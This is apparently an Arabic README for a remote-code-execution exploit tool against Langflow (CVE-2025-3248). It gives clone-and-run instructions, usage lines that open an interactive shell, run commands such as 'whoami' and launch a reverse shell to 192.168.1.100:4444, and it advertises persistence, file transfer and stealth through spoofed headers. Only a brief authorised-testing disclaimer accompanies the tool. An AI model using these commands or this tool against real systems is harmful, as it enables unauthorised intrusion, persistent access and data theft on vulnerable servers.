
استغلال تنفيذ التعليمات البرمجية عن بُعد لـ Langflow (CVE-2025-3248) - [ بواسطة S4Tech ]
أداة استغلال تنفيذ الأوامر عن بعد في Langflow (CVE-2025-3248)
persist)upload local_path remote_pathdownload remote_path local_pathclear للطرفيةUser-Agent عشوائيX-Forwarded-Forexploit_log.txt.langflow_shell_history)requestscoloramareadlinegit clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt
python exploit.py <URL> [options]
python exploit.py http://target.com
python exploit.py http://target.com --shell
python exploit.py http://target.com --command "whoami"
python exploit.py http://target.com --reverse 192.168.1.100 4444
Image.png)
⚠️ هذه الأداة مخصصة لأغراض التعليم والاختبار المصرح به فقط.
⚠️ الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن باختبارها يعد غير قانوني.
هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.
نرحب بطلبات السحب. للتغييرات الكبيرة، يرجى فتح مشكلة أولاً لمناقشة ما ترغب في تغييره.
| الميزة | v1.0 | v2.0 |
|---|
| طرق الحمولة | 1 | 5 |
| نقل الملفات | ❌ غير مدعوم | ✅ مدعوم |
| الثبات | ❌ | ✅ |
| مستوى التخفي | أساسي | متقدم |
| تسجيل الجلسة | ❌ | ✅ |
| الخيار | الوصف |
|---|
--shell | بدء شل تفاعلية |
--reverse IP PORT | إطلاق شل عكسية إلى IP:PORT محدد |
--command CMD | تنفيذ أمر واحد |
--verbose | تفعيل الإخراج المفصل |
--timeout SEC | تعيين مهلة الطلب (الافتراضي: 10 ثوانٍ) |